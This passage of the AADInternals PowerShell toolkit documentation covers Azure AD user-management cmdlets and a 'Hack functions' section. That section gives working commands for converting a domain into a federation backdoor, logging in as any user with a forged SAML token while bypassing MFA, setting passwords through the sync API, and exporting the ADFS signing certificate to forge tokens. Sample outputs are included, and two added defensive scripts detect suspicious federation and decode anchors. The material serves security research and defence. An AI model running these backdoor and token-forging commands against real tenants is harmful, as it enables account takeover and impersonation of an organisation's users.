UserPrincipalName                      : LeeG@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 2018-06-26T11:04:14Z

New-AADIntUser (A)

This function creates a new user. Currently supports only UserPrincipalName and DisplayName.


# Create a new user
New-AADIntUser -UserPrincipalName user@company.com -DisplayName "New User"


AlternateEmailAddresses                : 
AlternateMobilePhones                  : 
AlternativeSecurityIds                 : 
BlockCredential                        : false
City                                   : 
CloudExchangeRecipientDisplayType      : 
Country                                : 
Department                             : 
DirSyncProvisioningErrors              : 
DisplayName                            : New User
Errors                                 : 
Fax                                    : 
FirstName                              : 
ImmutableId                            : 
IndirectLicenseErrors                  : 
IsBlackberryUser                       : false
IsLicensed                             : false
LastDirSyncTime                        : 
LastName                               : 
LastPasswordChangeTimestamp            : 2018-10-25T15:13:10.8686574Z
LicenseAssignmentDetails               : 
LicenseReconciliationNeeded            : false
Licenses                               : 
LiveId                                 : 1003BFFDAEE167C0
MSExchRecipientTypeDetails             : 
MSRtcSipDeploymentLocator              : 
MSRtcSipPrimaryUserAddress             : 
MobilePhone                            : 
OathTokenMetadata                      : 
ObjectId                               : 13e121db-4132-43c8-a784-a9b12f2bd4e3
Office                                 : 
OverallProvisioningStatus              : None
PasswordNeverExpires                   : false
PasswordResetNotRequiredDuringActivate : 
PhoneNumber                            : 
PortalSettings                         : 
PostalCode                             : 
PreferredDataLocation                  : 
PreferredLanguage                      : 
ProxyAddresses                         : 
ReleaseTrack                           : 
ServiceInformation                     : 
SignInName                             : new.user@company.com
SoftDeletionTimestamp                  : 
State                                  : 
StreetAddress                          : 
StrongAuthenticationMethods            : 
StrongAuthenticationPhoneAppDetails    : 
StrongAuthenticationProofupTime        : 
StrongAuthenticationRequirements       : 
StrongAuthenticationUserDetails        : 
StrongPasswordRequired                 : true
StsRefreshTokensValidFrom              : 2018-10-25T15:13:10.8686574Z
Title                                  : 
UsageLocation                          : 
UserLandingPageIdentifierForO365Shell  : 
UserPrincipalName                      : new.user@company.com
UserThemeIdentifierForO365Shell        : 
UserType                               : Member
ValidationStatus                       : Healthy
WhenCreated                            : 
Password                               : Tog59451

Set-AADIntUser (A)

This function changes the user’s information.


# Set user information
Set-AADIntUser -UserPrincipalName user@company.com -FirstName "Dave"

Remove-AADIntUser (A)

This function removes a user.


# Remove the user
Remove-AADIntUser -UserPrincipalName user@company.com

Get-AADIntGlobalAdmins (A)

This function returns all Global Admins of the tenant.


# Get global admins
Get-AADIntGlobalAdmins

DisplayName    UserPrincipalName                 
-----------    -----------------                 
admin demo     admin@company.onmicrosoft.com
Dave the Admin dave@company.com            

User manipulation with AD sync API

These functions provide some functionality allowing manipulation of Azure AD objects otherwise impossible.

NOTE! These functions use the Azure AD synchronization API and may cause severe harm to the tenant! USE AT YOUR OWN RISK!

Get-AADIntSyncObjects (A)

This function returns all Azure AD objects that are not synced to the on-premises AD.


# Get synchronisable objects from AAD
Get-AADIntSyncObjects | Select UserPrincipalName



Set-AADIntAzureADObject (A)

This function creates a new OR modifies an existing Azure AD object.

Allows setting all Azure AD attributes. The sourceAnchor attribute is the most important one and is set automatically only for synced users. This is typically the ImmutableID (the Base64 encoded GUID of the on-prem AD object), but can be any string that is unique tenant wide.


# Create a new user
Set-AADIntAzureADObject -userPrincipalName "someone@company.com" -sourceAnchor "ABC" -netBiosName


CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add
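
Because sourceAnchor is normally the Base64 encoded on-prem GUID but may be any string, the following added example (not part of AADInternals) converts between the two forms and marks anchors that do not decode to a GUID. The function names are hypothetical, the sample values are the two anchors shown on this page, and treating a non-GUID anchor as a review lead assumes the tenant uses the default GUID-based anchor.

```powershell
# Added example, not AADInternals code. Function names are hypothetical.

# Base64 ImmutableId/sourceAnchor -> on-prem objectGUID (or $null if it is not one)
function Resolve-SourceAnchor {
    param([Parameter(Mandatory)][AllowEmptyString()][string] $SourceAnchor)
    $guid = $null
    try {
        $bytes = [Convert]::FromBase64String($SourceAnchor)
        # A GUID is exactly 16 bytes; anything else is a free-form anchor
        if ($bytes.Length -eq 16) { $guid = [guid]::new([byte[]]$bytes) }
    } catch {
        # Not valid Base64, so the anchor was not derived from a GUID
    }
    [pscustomobject]@{
        SourceAnchor = $SourceAnchor
        IsGuidAnchor = ($null -ne $guid)
        OnPremGuid   = $guid
    }
}

# on-prem objectGUID -> Base64 ImmutableId/sourceAnchor
function ConvertTo-SourceAnchor {
    param([Parameter(Mandatory)][guid] $ObjectGuid)
    [Convert]::ToBase64String($ObjectGuid.ToByteArray())
}

# Anchors taken from the examples on this page
$anchors = 'ABC', 'qIMPTm2Q3kimHgg4KQyveA=='
$report  = $anchors | ForEach-Object { Resolve-SourceAnchor -SourceAnchor $_ }
$report | Format-Table -AutoSize

# Anchors that cannot be mapped back to an on-prem object deserve a closer look
$report | Where-Object { -not $_.IsGuidAnchor } | Select-Object SourceAnchor

# Round trip: the decoded GUID encodes back to the same anchor
$report | Where-Object IsGuidAnchor | ForEach-Object {
    ConvertTo-SourceAnchor -ObjectGuid $_.OnPremGuid
}
```

The decoded GUID can be compared with the objectGUID attribute of on-prem AD accounts to find which directory object a given cloud anchor belongs to.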

Remove-AADIntAzureADObject (A)

This function removes an AAD object.


# Remove AAD object
Remove-AADIntAzureADObject -sourceAnchor ABC


CloudAnchor            : User_d14f7322-c997-4e87-912b-f43c906cec81
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : ABC
SyncOperation          : Add

Set-AADIntUserPassword (A)

This function sets the user’s password. The last change time can also be set, but it must be before the current time.


# Set the password and the change date to 1/1/1970
Set-AADIntUserPassword -SourceAnchor qIMPTm2Q3kimHgg4KQyveA== -Password "a" -ChangeDate 1/1/1970

Output: (Result 0 = success)

CloudAnchor Result SourceAnchor            
----------- ------ ------------            
CloudAnchor 0      qIMPTm2Q3kimHgg4KQyveA==

Reset-AADIntServiceAccount (A)

This function creates a new service account (or resets the password of an existing one). The created user will have the DirectorySynchronizationAccount role.

Azure AD Connect uses this during the configuration stage to create the service account and stores the username and password in the configuration database.


# Create a new service account for AD sync
Reset-AADIntServiceAccount -ServiceAccount Sync_MyServer_nnnnnnn


Password         UserName                                          
--------         --------                                          
5(]lCy=Q{.#@lb}p Sync_MyServer_nnnnnnn@company.onmicrosoft.com

Hack functions

Hack functions are used to hack Azure AD and Office 365. These functions exploit known and not-so-known AAD features.


Set-AADIntDomainAuthentication (A)

Sets the authentication method of the domain. Same functionality as the Set-MsolDomainAuthentication cmdlet.


# Set authentication method to managed
Set-AADIntDomainAuthentication -DomainName company.com -Authentication Managed

ConvertTo-AADIntBackdoor (A)

This function converts the given domain to a “backdoor”, which can be used to log in to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor.

This exploits a vulnerability I discovered in late 2017. Technically, the domain authentication type is set to Federated and configured to trust a specific certificate (any.sts) and issuer. You can get a free domain from www.myo365.site.


# Convert the domain to backdoor
ConvertTo-AADIntBackdoor -DomainName company.myo365.site


Backdoor created. Domain: company.myo365.site, issuer=http://sts.0nmicrosoft.com/b7d61fa9-afb3-4911-a2e8-8a9f2680a1ed
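
Since the backdoor is an ordinary domain set to Federated with an attacker-chosen issuer, it shows up in a domain inventory. The following added example (not part of AADInternals) flags federated domains whose issuer is not on an approved list; the function name and the approved ADFS issuer are assumptions, the sample inventory is constructed, and the commented live query uses the MSOnline cmdlets Get-MsolDomain and Get-MsolDomainFederationSettings.

```powershell
# Added example, not AADInternals code. Function name is hypothetical.
function Find-UnexpectedFederation {
    param(
        [Parameter(Mandatory)][object[]] $Domains,         # Name, Authentication, IssuerUri
        [Parameter(Mandatory)][string[]] $ApprovedIssuers  # issuers of your own STS
    )
    foreach ($d in $Domains) {
        if ($d.Authentication -ne 'Federated') { continue }      # managed domains are fine
        if ($ApprovedIssuers -contains $d.IssuerUri) { continue } # known federation trust

        # Extract the issuer host so look-alike names are easy to spot in the report
        $issuerHost = $null
        $uri = $null
        if ([Uri]::TryCreate([string]$d.IssuerUri, [UriKind]::Absolute, [ref]$uri)) {
            $issuerHost = $uri.Host
        }
        [pscustomobject]@{
            Domain     = $d.Name
            IssuerUri  = $d.IssuerUri
            IssuerHost = $issuerHost
            Reason     = 'Federated domain with an issuer that is not approved'
        }
    }
}

# Constructed inventory. The first issuer is a made-up legitimate ADFS issuer;
# the last entry uses the domain and issuer printed in the output above.
$sample = @(
    [pscustomobject]@{ Name = 'company.com'; Authentication = 'Federated'
                       IssuerUri = 'http://sts.company.com/adfs/services/trust' }
    [pscustomobject]@{ Name = 'company.onmicrosoft.com'; Authentication = 'Managed'
                       IssuerUri = $null }
    [pscustomobject]@{ Name = 'company.myo365.site'; Authentication = 'Federated'
                       IssuerUri = 'http://sts.0nmicrosoft.com/b7d61fa9-afb3-4911-a2e8-8a9f2680a1ed' }
)
$approved = @('http://sts.company.com/adfs/services/trust')
Find-UnexpectedFederation -Domains $sample -ApprovedIssuers $approved | Format-List

# Building the same inventory from a live tenant (after Connect-MsolService):
# $live = Get-MsolDomain | ForEach-Object {
#     $fed = if ($_.Authentication -eq 'Federated') {
#         Get-MsolDomainFederationSettings -DomainName $_.Name }
#     [pscustomobject]@{ Name = $_.Name; Authentication = $_.Authentication
#                        IssuerUri = $fed.IssuerUri }
# }
```

Running the check on a schedule and alerting on any new row also catches a domain that is added to the tenant and federated later.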

Open-AADIntOffice365Portal (*)

This function creates a fake (but valid) WS-Fed/SAML authentication token in an .html file and opens it in Internet Explorer in private mode. Use any ImmutableId from any user from your tenant and the issuer “http://sts.0nmicrosoft.com/” you created with ConvertTo-AADIntBackdoor.

Internet Explorer should log in automatically unless security settings don’t allow that. If that happens, just click Allow blocked content or the button Login to Office 365 and you’re done! From there, you can also browse to https://portal.azure.com as the same user you just logged in as.


# Login as anyone
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://sts.0nmicrosoft.com/b7d61fa9-afb3-4911-a2e8-8a9f2680a1ed" -UseBuiltInCertificate -ByPassMFA $true

Output: [screenshot: security alert]

Set-AADIntPassThroughAuthentication (P)

This function enables or disables pass-through authentication (PTA).


# Prompt for credentials and store the token
$pt=Get-AADIntAccessTokenForPTA -Credentials (Get-Credential)
# Disable PTA
Set-AADIntPassThroughAuthentication -AccessToken $pt -Enable $false


IsSuccesful Enable Exists
----------- ------ ------
true        false  true 

New-AADIntGuestInvitation (Z)

This function invites a guest user to the tenant. Does not require admin rights, as long as access to Azure Portal is allowed. Basically, this function allows every member of the tenant to invite guest users to the tenant.


# Get the auth token. Supports also external users (outlook.com, etc.)
$zt=Get-AADIntAuthTokenForAADIAMAPI -Credentials (Get-Credential)
# Invite a guest user to the tenant
New-AADIntGuestInvitation -AuthToken $zt -EmailAddress someone@outlook.com -Message "Welcome to our tenant!"


accountEnabled                        : True
usageLocation                         : 
mailNickname                          : someone_outlook.com#EXT#
passwordProfile                       : 
rolesEntity                           : 
selectedGroupIds                      : 
streetAddress                         : 
city                                  : 
state                                 : 
country                               : 
telephoneNumber                       : 
mobile                                : 
physicalDeliveryOfficeName            : 
postalCode                            : 
authenticationPhoneNumber             : 
authenticationAlternativePhoneNumber  : 
authenticationEmail                   : 
strongAuthenticationDetail            : @{verificationDetail=}
defaultImageUrl                       : 
ageGroup                              : 
consentProvidedForMinor               : 
legalAgeGroupClassification           : 
objectId                              : e250c8f5-3ff3-4eea-9d68-cff019fa850e
objectType                            : User
displayName                           : someone
userPrincipalName                     : someone_outlook.com#EXT#@company.onmicrosoft.com
thumbnailPhoto@odata.mediaContentType : 
givenName                             : 
surname                               : 
mail                                  : someone@outlook.com
dirSyncEnabled                        : 
alternativeSecurityIds                : {}
signInNamesInfo                       : {}
signInNames                           : {someone_outlook.com#EXT#@company.onmicrosoft.com}
ownedDevices                          : 
jobTitle                              : 
department                            : 
displayUserPrincipalName              : 
hasThumbnail                          : False
imageUrl                              : 
imageDataToUpload                     : 
source                                : 
sources                               : 
sourceText                            : 
userFlags                             : 
deletionTimestamp                     : 
permanentDeletionTime                 : 
alternateEmailAddress                 : 
manager                               : 
userType                              : Guest
isThumbnailUpdated                    : 
isAuthenticationContactInfoUpdated    : 
searchableDeviceKey                   : {}
displayEmail                          : 
creationType                          : Invitation
userState                             : PendingAcceptance
otherMails                            : {someone@outlook.com}

Export-AADIntADFSSigningCertificate (*)

This function exports the ADFS token signing certificate and decrypts it. Must be run on the ADFS server.

The certificate can be used to create faked but valid SAML tokens.

Unfortunately the decryption part doesn’t work - yet. All help to solve this is more than welcome!


# Export the ADFS token signing certificate
Export-AADIntADFSSigningCertificate


1 rows copied.
Network packet size (bytes): 4096
Clock Time (ms.) Total     : 16     Average : (62.50 rows per sec.)
Exception calling "Close" with "0" argument(s): "The input data is not a complete block."
At line:95 char:9
+         $cs.Close()
+         ~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CryptographicException
About Dr Nestori Syynimaa
Dr Syynimaa works as a CIO of eight cities and municipalities surrounding Tampere, the largest inland city in Nordic countries. He also runs his own consultation business Gerenios. Before moving to his current position, Dr Syynimaa worked as a consultant, trainer, and university lecturer for almost 20 years. He is a regular speaker on Office 365 and Azure security in scientific and professional conferences. Dr Syynimaa holds MCSA (Office 365) and is Microsoft Certified Trainer.